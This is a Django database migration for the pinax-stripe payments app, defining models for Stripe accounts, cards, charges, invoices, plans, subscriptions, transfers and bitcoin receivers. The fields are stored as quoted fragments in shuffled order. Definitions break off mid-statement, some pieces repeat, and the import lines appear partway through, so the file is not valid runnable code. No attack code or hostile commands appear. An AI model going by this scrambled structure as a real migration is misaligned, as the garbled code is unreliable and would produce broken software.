('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)),", "('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True,", "null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True,", "('invoice', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='items', to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[", "models.BooleanField(default=False)), ('legal_entity_type', models.TextField(blank=True, null=True)), ('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)),", "jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True, max_length=100, null=True)), ('product_description', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email',", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), 
('amount_due', models.DecimalField(decimal_places=2, max_digits=9)),", "models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2,", "models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True,", "('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)),", "('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)),", "('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2,", "('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', 
models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)),", "models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency',", "null=True)), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin,", "max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd',", "related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', 
related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan',", "max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True, null=True)), ('currency', models.CharField(default='usd', max_length=25)),", "('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)),", "related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ],", "models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency',", "('traceback', models.TextField()), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False,", "null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', 
models.DateTimeField(blank=True, null=True)), ('verification_timestamp',", "null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ),", "bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)), ('kind', models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')),", "migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4',", "('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, 
on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)),", "unicode_literals from decimal import Decimal from django.conf import settings from django.db import migrations,", "('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment',", "null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,", "model_name='invoice', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount',", "name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name',", "('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, 
}, ), migrations.CreateModel( name='Customer',", "models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True,", "('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)),", "from django.conf import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone", "models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)),", "null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ],", "('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code', models.TextField(blank=True, null=True)), ('legal_entity_address_state', models.TextField(blank=True, null=True)), ('legal_entity_dob',", "models.IntegerField()), ('exp_year', models.IntegerField()), ('funding', models.CharField(max_length=15)), ('last4', models.CharField(blank=True, max_length=4)), 
('fingerprint', models.TextField()), ], options={ 'abstract':", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount',", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "), migrations.CreateModel( name='Invoice', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={", "False, }, ), migrations.CreateModel( name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True,", "serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end',", "models.CharField(editable=False, 
max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()),", "models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account',", "), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email',", "), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ),", "False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)),", "('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event',", 
"models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)), ('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True,", "models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True,", "to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32,", "models.DateTimeField()), ('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)),", "models.NullBooleanField()), ('attempt_count', models.PositiveIntegerField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)),", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, 
related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Customer')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name', models.TextField(blank=True, null=True)), ('country', models.TextField()), ('currency', models.TextField()),", "('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)),", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind',", "('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True,", "('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, 
primary_key=True,", "('closed', models.BooleanField(default=False)), ('description', models.TextField(blank=True)), ('paid', models.BooleanField(default=False)), ('receipt_number', models.TextField(blank=True)), ('period_end', models.DateTimeField()), ('period_start', models.DateTimeField()), ('subtotal',", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ),", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date',", "('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True,", "models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration',", "models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity', models.IntegerField(blank=True, null=True)),", "from __future__ import unicode_literals from decimal import Decimal from django.conf import settings from", "models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', 
models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True,", "False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)),", "null=True)), ('timezone', models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)),", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id',", "models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ),", "('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True,", "('legal_entity_verification_details', models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', 
models.TextField(blank=True, null=True)), ('type',", "models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)),", "models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={", "('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[", "False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2,", "('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True,", "models.TextField(blank=True, null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True,", "models.TextField(blank=True, null=True)), ('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, 
null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)),", "name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id', 'stripe_account')]),", "models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)),", "to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ), migrations.AlterUniqueTogether( name='plan', unique_together=set([('stripe_id', 'stripe_account')]), ), ]", "models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end',", "to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge',", "models.BooleanField(default=False)), ('used_for_payment', models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Card', fields=[ ('id',", "models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created', models.DateTimeField(blank=True, 
null=True)), ('available',", "null=True)), ('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)),", "models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)),", "('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)),", "name='Charge', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('source',", "('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE,", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)),", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 
'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[", "('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country',", "to='pinax_stripe.Customer'), ), migrations.AddField( model_name='bitcoinreceiver', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ), migrations.AlterUniqueTogether( name='useraccount', unique_together=set([('user', 'account')]), ),", "name='BitcoinReceiver', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active',", "('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid',", "}, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message',", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()),", "('destination', models.TextField(blank=True, null=True)), ('destination_payment', models.TextField(blank=True, null=True)), ('failure_code', models.TextField(blank=True, null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode',", 
"to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ),", "('legal_entity_verification_details_code', models.TextField(blank=True, null=True)), ('legal_entity_verification_document', models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata',", "models.TextField(blank=True, null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True,", "jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)),", "('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent', models.BooleanField(default=False)), ('charge_created',", "'monthly')], max_length=7, null=True)), ('payout_schedule_monthly_anchor', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_weekly_anchor', models.TextField(blank=True, null=True)), ('payout_statement_descriptor', models.TextField(blank=True, null=True)), ('payouts_enabled',", "models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], 
